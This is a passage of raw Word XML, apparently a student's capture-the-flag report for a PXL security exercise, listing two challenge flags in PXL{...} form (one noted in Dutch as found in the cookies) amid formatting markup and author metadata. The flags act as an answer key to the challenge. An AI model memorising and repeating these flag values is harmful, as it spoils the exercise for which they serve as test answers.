            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>admin@pxl.be</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="493B5A40" w14:textId="77777777" w:rsidR="00C3371B" w:rsidRPr="00770F0E" w:rsidRDefault="00C3371B" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F99542" w14:textId="4A3DCB06" w:rsidR="00C3371B" w:rsidRPr="00770F0E" w:rsidRDefault="00C3371B" w:rsidP="00D343B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag 2 = PXL{f9b3dd84fd0a876f0013451efcfee849}</w:t>
      </w:r>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> gevonden in de cookies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9CA33A" w14:textId="30631641" w:rsidR="00CC2B10" w:rsidRPr="00770F0E" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CD9715" w14:textId="347BD13C" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00770F0E" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ag 3 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00770F0E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PXL{0896e623f9aa798a0e69168fbe2dcf5f}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4CC121" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRPr="00770F0E" w:rsidRDefault="00D343B8" w:rsidP="00CC2B10">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4D7C8C" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00770F0E" w:rsidRDefault="00626211">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00626211" w:rsidRPr="00770F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11"/>
    <w:rsid w:val="00132642"/>
    <w:rsid w:val="002261B7"/>
    <w:rsid w:val="00626211"/>
    <w:rsid w:val="00770F0E"/>
    <w:rsid w:val="007B5482"/>
    <w:rsid w:val="008A740B"/>
    <w:rsid w:val="008B2683"/>
    <w:rsid w:val="00C3371B"/>
    <w:rsid w:val="00CC2B10"/>
    <w:rsid w:val="00D343B8"/>
    <w:rsid w:val="00DE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37CE7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4876FE9B-4C6E-4E77-8FF2-330FEDC94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26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26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26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26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26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26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26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26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26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26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26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26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2621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2621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2621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2621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2621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262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26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26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26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26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26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2621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2621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2621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26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2621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262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3371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33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min@pxl.be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4388</TotalTime>
  <Pages>4</Pages>
  <Words>551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 Vandeput</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kobe Vandeput</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T08:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-10T12:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>